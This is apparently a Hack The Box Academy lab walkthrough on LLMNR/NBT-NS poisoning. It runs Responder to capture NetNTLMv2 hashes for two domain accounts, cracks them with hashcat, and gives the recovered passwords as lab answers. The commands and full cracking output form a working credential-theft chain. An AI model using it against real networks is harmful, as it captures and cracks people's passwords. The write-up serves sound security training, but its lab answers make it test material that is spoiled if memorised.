Skip to content

LLMNR/NBT-NS Poisoning - from Linux

ℹ️ Informations

Question

Run Responder and obtain a hash for a user account that starts with the letter b. Submit the account name as your answer.

Abstract

Let's start by logging into the target machine via SSH using the provided credentials: htb-student:HTB_@cademy_stdnt!.
Then, we listen with responder: 

sudo responder -I ens224
We wait for a user whose name starts with "b" to make a request. Upon receiving a request from backupagent: 
[SMB] NTLMv2-SSP Hash     : backupagent::INLANEFREIGHT:9e4e94d637e98034:7B45F15D0FBBB2F93F26C9AB159C8C42:010100000000000080D15BC784A1DB01F55CEE317007B22300000000020008005400480037004F0001001E00570049004E002D005A00470052004400390047004100360056005A00430004003400570049004E002D005A00470052004400390047004100360056005A0043002E005400480037004F002E004C004F00430041004C00030014005400480037004F002E004C004F00430041004C00050014005400480037004F002E004C004F00430041004C000700080080D15BC784A1DB0106000400020000000800300030000000000000000000000000300000275EF31D24CD79C624E8089BC8B85262F06CE56E83254950939F65AE61CA08840A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000

Answer

backupagent

Question

Crack the hash for the previous account and submit the cleartext password as your answer.

📋 Walkthrough

Now we can crack the hash using hashcat: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14915/29894 MB (4096 MB allocatable), 24MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 6 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

BACKUPAGENT::INLANEFREIGHT:9e4e94d637e98034:7b45f15d0fbbb2f93f26c9ab159c8c42:010100000000000080d15bc784a1db01f55cee317007b22300000000020008005400480037004F0001001E00570049004E002D005A00470052004400390047004100360056005A00430004003400570049004E002D005A00470052004400390047004100360056005A0043002E005400480037004F002E004C004F00430041004C00030014005400480037004F002E004C004F00430041004C00050014005400480037004F002E004C004F00430041004C000700080080D15BC784A1DB0106000400020000000800300030000000000000000000000000300000275ef31d24cd79c624e8089bc8b85262f06ce56e83254950939f65ae61ca08840a001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000:h1backup55

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: BACKUPAGENT::INLANEFREIGHT:9e4e94d637e98034:7b45f15...000000
Time.Started.....: Sun Mar 30 21:09:30 2025 (1 sec)
Time.Estimated...: Sun Mar 30 21:09:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5857.3 kH/s (1.98ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7741440/14344385 (53.97%)
Rejected.........: 0/7741440 (0.00%)
Restore.Point....: 7716864/14344385 (53.80%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: hailey5085 -> gw37075
Hardware.Mon.#1..: Temp: 45c Util: 50%

Started: Sun Mar 30 21:09:29 2025
Stopped: Sun Mar 30 21:09:33 2025

The account credentials are backupagent:h1backup55.

Answer

h1backup55

Question

Run Responder and obtain an NTLMv2 hash for the user wley. Crack the hash using Hashcat and submit the user's password as your answer.

📋 Walkthrough

We proceed similarly as before. In my case, I have already retrieved the hash for wley, so I will search for it in the responder logs.

┌─[htb-student@ea-attack01][~]
└──╼ $grep "wley" /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.5.130.txt 
wley::INLANEFREIGHT:def8507f67a3f2f2:84A3BBE763A9B3EDB0D8E5B6B1FAD8D6:010100000000000080D15BC784A1DB019BA9DC43D49263F300000000020008005400480037004F0001001E00570049004E002D005A00470052004400390047004100360056005A00430004003400570049004E002D005A00470052004400390047004100360056005A0043002E005400480037004F002E004C004F00430041004C00030014005400480037004F002E004C004F00430041004C00050014005400480037004F002E004C004F00430041004C000700080080D15BC784A1DB0106000400020000000800300030000000000000000000000000300000275EF31D24CD79C624E8089BC8B85262F06CE56E83254950939F65AE61CA08840A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000

Now we crack the password using hashcat: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14915/29894 MB (4096 MB allocatable), 24MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Initializing device kernels and memory. Please be patient..Initializing backend runtime for device #1. Please be patieHost memory required for this attack: 6 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

WLEY::INLANEFREIGHT:def8507f67a3f2f2:84a3bbe763a9b3edb0d8e5b6b1fad8d6:010100000000000080d15bc784a1db019ba9dc43d49263f300000000020008005400480037004F0001001E00570049004E002D005A00470052004400390047004100360056005A00430004003400570049004E002D005A00470052004400390047004100360056005A0043002E005400480037004F002E004C004F00430041004C00030014005400480037004F002E004C004F00430041004C00050014005400480037004F002E004C004F00430041004C000700080080D15BC784A1DB0106000400020000000800300030000000000000000000000000300000275ef31d24cd79c624e8089bc8b85262f06ce56e83254950939f65ae61ca08840a001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000:transporter@4
...
<SNIP>

Answer

transporter@4